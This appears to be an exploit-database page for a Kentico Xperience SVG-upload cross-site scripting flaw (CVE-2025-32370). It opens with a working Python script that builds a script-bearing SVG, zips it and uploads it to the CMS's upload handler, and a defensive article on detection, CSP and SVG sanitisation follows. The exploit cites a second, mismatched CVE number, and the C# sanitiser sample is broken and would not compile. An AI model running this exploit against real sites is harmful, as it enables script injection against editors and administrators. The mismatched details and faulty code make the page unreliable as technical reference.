Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)

Exploit Author: Alex Messham Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Unknown Published Date: 2025-05-13

# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370

import requests
import subprocess
import os
import argparse

def create_svg_payload(svg_filename: str):
    print(f"[*] Writing malicious SVG to: {svg_filename}")
    svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
 xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
    with open(svg_filename, 'w') as f:
        f.write(svg_payload)

def zip_payload(svg_filename: str, zip_filename: str):
    print(f"[*] Creating zip archive: {zip_filename}")
    subprocess.run(['zip', zip_filename, svg_filename], check=True)

def upload_zip(zip_filename: str, target_url: str):
    full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
    headers = {
        "Content-Type": "application/octet-stream"
    }

    print(f"[+] Uploading {zip_filename} to {full_url}")
    with open(zip_filename, 'rb') as f:
        response = requests.post(full_url, headers=headers, data=f,
verify=False)

    if response.status_code == 200:
        print("[+] Upload succeeded")
    else:
        print(f"[-] Upload failed with status code {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
    parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
    parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
    parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")

    args = parser.parse_args()

    create_svg_payload(args.svg)
    zip_payload(args.svg, args.zip)
    upload_zip(args.zip, args.url)
```

Kentico Xperience 13.0.178 — Cross‑Site Scripting (CVE‑2025‑32370): Overview, Impact, and Mitigation

This article explains the Cross‑Site Scripting (XSS) vulnerability tracked as CVE‑2025‑32370 affecting Kentico Xperience versions prior to 13.0.178. It covers what the issue is, why it matters, how to detect exploitation, and safe, practical mitigations and hardening steps. The content is written for system administrators, developers, and security teams looking to understand risk and remediate systems without reproducing exploit techniques.

Quick facts

Item	Details
CVE	CVE‑2025‑32370
Product	Kentico Xperience
Affected versions	Versions prior to 13.0.178
Vulnerability class	Cross‑Site Scripting (XSS) — file upload / content handling
Disclosure date	2025‑05‑09 (public disclosure)
Severity	High (depends on context and privileges of victims)
Primary remediation	Upgrade to Kentico Xperience 13.0.178 or later

Summary

The reported vulnerability allowed an attacker to upload an archive containing crafted vector image content (SVG) that, when handled or rendered by the application, resulted in execution of embedded client‑side script in the context of a victim’s browser. This is an XSS issue that can lead to session theft, account takeover, or unauthorized actions performed in the context of authenticated users (depending on site configuration and user privileges).

Why this matters

XSS in a CMS can be particularly dangerous because many users (including administrators) view uploaded assets or pages that reference them. Successful XSS can escalate into credential theft or code execution in admin interfaces.
The vulnerability involved file upload and archive handling — commonly exposed functionality in content management systems — which increases attack surface if uploads are unauthenticated or insufficiently validated.
Exploited in chained attacks, XSS can act as a pivot to further compromise the application or its users.

High‑level technical overview (non‑actionable)

At a high level, the underlying cause was improper handling and sanitization of user‑supplied files inside uploaded archives (ZIP). The application processed vector image (SVG) content from the uploaded package and made that content available to web clients without removing executable elements (for example, <script> nodes or event handler attributes). When the sanitized checks were missing or insufficient, a malicious SVG could cause client‑side script to execute when the file was viewed or referenced by a page.

Typical impact scenarios

Stored XSS: A malicious file uploaded to the media library is later loaded by editors or site visitors, executing attacker script persistently.
Reflected/indirect XSS: Upload behaviour combined with specific request patterns can cause immediate script execution in a victim’s browser.
Privilege abuse: If an administrative user is targeted, XSS may enable session token theft, CSRF circumvention, or content modification.

Detection and indicators of compromise (IoCs)

Monitor and investigate the following signs that may indicate exploitation or attempted exploitation:

Unexpected or unusually named uploaded archive files in the media repository or temporary upload folders.
Files with image extensions whose content type is XML/SVG or which contain script-like elements when inspected.
Web logs showing requests to asset URLs with unusual query parameters or requests that return SVG/XML responses containing <script> or on* attributes.
Unusual activity from accounts that manage content or upload files (new uploads, changed permissions, or logins from unfamiliar IPs).
Browser security console logs or WAF alerts noting script execution originating from uploaded assets.

Immediate actions (prioritized)

Apply the vendor patch: upgrade Kentico Xperience to version 13.0.178 or later as the primary remediation.
If patching immediately is not possible, restrict access to the upload endpoint(s) — e.g., limit to trusted IPs, require authentication, or temporarily disable public upload functionality.
Audit recent uploads to the media library for unknown archives and inspect SVG/ XML assets for script elements or suspicious attributes.
Enable or tighten Content Security Policy (CSP) to restrict where scripts can be loaded and executed (see CSP example below).

Recommended long‑term mitigations and hardening

Enforce server‑side file validation: do not rely solely on client file type checks. Verify file signatures and content type.
Disallow inline scripting in images: treat SVGs as potentially executable XML and either remove script elements or convert vector images to safer raster formats if scripting is not required.
Use an HTML/XML sanitizer for SVGs that strips <script>, <foreignObject>, event handler attributes (onload/onerror, etc.), and dangerous namespaces.
Store uploaded files outside of web root or serve them through a proxy that enforces safe headers (e.g., correct Content‑Type and Content‑Disposition) and optionally rewrites SVGs to safe variants.
Harden server headers: add CSP, X‑Content‑Type‑Options: nosniff, and X‑Frame‑Options to reduce client‑side risk.
Audit application roles and minimize the number of users with upload privileges.
Implement monitoring and WAF rules to detect suspicious archive uploads or SVG content containing script or unusual attributes.

Safe configuration examples

Below are defensive configuration and code patterns you can adopt. These examples are intended for remediation and hardening — they do not reproduce exploit logic.

Example: Content Security Policy (CSP)

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-...'; object-src 'none'; img-src 'self' data:;

Explanation: A strict CSP reduces the risk of injected scripts running. Restrict script sources to trusted origins and prevent the use of plugin objects. Use nonces or hashes for legitimate inline scripts.

Example: Server‑side SVG sanitization (conceptual C#/.NET)

// Conceptual example: load SVG as XML, remove script nodes and event attributes.
// Use well‑maintained libraries for production; treat this as a pattern, not a drop‑in solution.

using System.Xml;
using System.Linq;

XmlDocument svg = new XmlDocument();
svg.Load(stream); // stream from uploaded file

// Remove script nodes
var scriptNodes = svg.GetElementsByTagName("script").Cast().ToList();
foreach (var n in scriptNodes) n.ParentNode.RemoveChild(n);

// Remove attributes that start with "on" (event handlers) and javascript: URIs
var nodes = svg.SelectNodes("//*");
foreach (XmlElement el in nodes)
{
    var toRemove = new List();
    foreach (XmlAttribute attr in el.Attributes)
    {
        if (attr.Name.StartsWith("on", StringComparison.OrdinalIgnoreCase)
            || attr.Value.StartsWith("javascript:", StringComparison.OrdinalIgnoreCase))
        {
            toRemove.Add(attr.Name);
        }
    }
    foreach (var a in toRemove) el.RemoveAttribute(a);
}

// Save sanitized SVG and continue processing
svg.Save(sanitizedOutputPath);

Explanation: This conceptual snippet shows the pattern of parsing SVG as XML, removing <script> elements and attributes that begin with "on" (event handlers), and preventing javascript: URIs. In production, use robust, tested sanitization libraries and whitelist allowed elements/attributes instead of ad hoc removal. Also validate namespaces and entity expansion settings to avoid XML attacks.

Example: Reject or reclassify risky file types at upload

// Server-side upload handler: check extension and file signature (pseudo-code)
if (fileExtension.Equals(".svg", OrdinalIgnoreCase))
{
    // Option A: Reject uploads of raw SVGs unless explicitly required
    RejectUpload("SVG uploads are not allowed; convert to PNG/JPEG.");

    // Option B: If SVGs are needed, sanitize and store with safe headers
    sanitized = SanitizeSvg(uploadStream);
    SaveFileTemporarily(sanitized);
}
else if (IsZipArchive(fileStream))
{
    // Inspect archive entries: reject if archive contains SVG or executable content
    foreach (entry in ZipEntries(fileStream))
    {
        if (entry.FileName.EndsWith(".svg", OrdinalIgnoreCase))
            RejectUpload("Archive contains disallowed file types.");
    }
}

Explanation: Always perform server‑side checks for both file extension and file signature (magic bytes). For archives, inspect all entries before extracting or storing. Prefer denying dangerous file types or sanitizing them before making them publicly accessible.

Operational guidance for responders

Inventory all instances of Kentico Xperience in your environment and identify version numbers. Prioritize internet‑exposed and high‑privilege instances for immediate patching.
Audit recent uploads and remove or quarantine suspicious files. Preserve originals for forensic review if compromise is suspected.
Rotate credentials and invalidate sessions for accounts that may have been impacted, especially admin users.
Check webserver and application logs for anomalous requests tied to uploaded assets. Look for patterns of access to media URLs that correlate with user sessions that later exhibited anomalous behavior.
Apply vendor advisories and perform post‑patch verification to ensure mitigations are effective (test upload flows, verify sanitization and headers).

Vendor and patching

Kentico released a fix in 13.0.178. The safest and fastest remediation is to upgrade to the patched release provided by the vendor. Consult official Kentico release notes and follow standard patching/testing procedures for your environment (staging validation, backups, rollback plan).

Final recommendations

Upgrade to Kentico Xperience 13.0.178 or later as soon as possible.
Harden upload handling — validate archive contents, sanitize SVGs, and deny executable content inside uploads.
Apply defensive HTTP headers (CSP, X‑Content‑Type‑Options, Referrer‑Policy) and monitor for suspicious uploads or asset requests.
Establish a patch management and incident response workflow to quickly address future vulnerabilities.

References & further reading

Vendor security advisory and release notes (refer to Kentico official site for the authoritative patch advisory and upgrade instructions).
OWASP guidance on file upload security and SVG sanitization best practices.
Content Security Policy (CSP) specification and deployment guides.